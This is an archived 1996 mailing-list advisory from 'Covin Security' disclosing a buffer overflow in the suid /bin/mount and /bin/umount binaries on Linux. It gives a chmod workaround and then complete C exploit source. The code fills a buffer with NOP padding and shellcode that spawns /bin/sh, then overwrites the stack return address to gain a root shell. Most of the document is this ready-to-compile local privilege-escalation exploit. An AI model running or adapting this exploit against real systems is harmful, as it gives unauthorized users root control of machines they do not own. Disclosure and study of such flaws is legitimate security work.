137 lines
4.5 KiB
Plaintext
137 lines
4.5 KiB
Plaintext
|
|
Vulnrability in all known Linux distributions
|
|
|
|
bloodmask (bloodmask@mymail.com)
|
|
Tue, 13 Aug 1996 07:04:25 +0200
|
|
|
|
Greetings,
|
|
|
|
Well folks, After all the other security issues in Linux, I can't say
|
|
I'm really that shocked about this one, anyway, read the officail covin
|
|
release. After finding this one, we at covin decided it's time to put
|
|
and end to this issue, and we've begun scanning all of Linux's suid
|
|
binaries for other hints of these hidden "features", Results will be
|
|
released soon. The reason we are also releasing the exploit, an act
|
|
which may seem highly inresponsable, is due to previous expieriance that
|
|
making the exploit widely available, ussually speeds up the proccess of
|
|
patching up stupid vulnerabilities like these.
|
|
|
|
|
|
BTW, This is kind of out of topic, but I figure, there's nothing wrong
|
|
with killing two birds with one stone... Ijust noticed when installing
|
|
the latest version of the shadow suite, taken from sunsite, that it
|
|
"unpatched" the lib enviorment vulnerability on my system. I haven't had
|
|
the time to determine *HOW* it exposed my system, but it would be wise
|
|
to check up on this matter.
|
|
|
|
--------------2F3F790C537451604439D8BF
|
|
Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit"
|
|
Content-Transfer-Encoding: 7bit
|
|
Content-Disposition: inline; filename="cvnmount.exploit"
|
|
|
|
Covin Security Releases:
|
|
(mount bufferoverflow exploit v1.0)
|
|
|
|
Tested operated systems: All current distributions of Linux
|
|
|
|
Affect: Local users on systems affected can gain overflow mounts syntax
|
|
buffer and execute a shell by overwriting the stack.
|
|
|
|
Affected binaries:
|
|
(/bin/mount and /bin/umount)
|
|
|
|
Workaround:
|
|
On all current distributions of Linux remove suid bit of /bin/mount and
|
|
/bin/umount.
|
|
[chmod -s /bin/mount;chmod -s /bin/umount]
|
|
|
|
Remarks:
|
|
For gods sake, how many more times are we gonna see this kind of problem?
|
|
It's been with Linux since it's very beggining, and it's so easy to
|
|
exploit. Similiar buffer overflow vulnerabilities have been found in
|
|
Linux distributions many times before, splitvt, dip, just to name a few
|
|
examples.
|
|
|
|
|
|
Any remarks, notes or other forms of feedback may be redirected to:
|
|
bloodmask@mymail.com
|
|
<------------------------------[ Cut here ]---------------------------------->
|
|
|
|
/* Mount Exploit for Linux, Jul 30 1996
|
|
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
|
|
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
|
|
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
|
|
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
|
|
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
|
|
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
|
|
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
|
|
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
|
|
:::::::...........:::...........:::...........::.......:......:.......::::::
|
|
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
|
|
|
|
Discovered and Coded by Bloodmask & Vio
|
|
Covin Security 1996
|
|
*/
|
|
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <fcntl.h>
|
|
#include <sys/stat.h>
|
|
|
|
#define PATH_MOUNT "/bin/umount"
|
|
#define BUFFER_SIZE 1024
|
|
#define DEFAULT_OFFSET 50
|
|
|
|
u_long get_esp()
|
|
{
|
|
__asm__("movl %esp, %eax");
|
|
|
|
}
|
|
|
|
main(int argc, char **argv)
|
|
{
|
|
u_char execshell[] =
|
|
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
|
|
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
|
|
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
|
|
|
|
char *buff = NULL;
|
|
unsigned long *addr_ptr = NULL;
|
|
char *ptr = NULL;
|
|
|
|
int i;
|
|
int ofs = DEFAULT_OFFSET;
|
|
|
|
buff = malloc(4096);
|
|
if(!buff)
|
|
{
|
|
printf("can't allocate memory\n");
|
|
exit(0);
|
|
}
|
|
ptr = buff;
|
|
|
|
/* fill start of buffer with nops */
|
|
|
|
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
|
|
ptr += BUFFER_SIZE-strlen(execshell);
|
|
|
|
/* stick asm code into the buffer */
|
|
|
|
for(i=0;i < strlen(execshell);i++)
|
|
*(ptr++) = execshell[i];
|
|
|
|
addr_ptr = (long *)ptr;
|
|
for(i=0;i < (8/4);i++)
|
|
*(addr_ptr++) = get_esp() + ofs;
|
|
ptr = (char *)addr_ptr;
|
|
*ptr = 0;
|
|
|
|
(void)alarm((u_int)0);
|
|
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
|
|
execl(PATH_MOUNT, "mount", buff, NULL);
|
|
}
|
|
|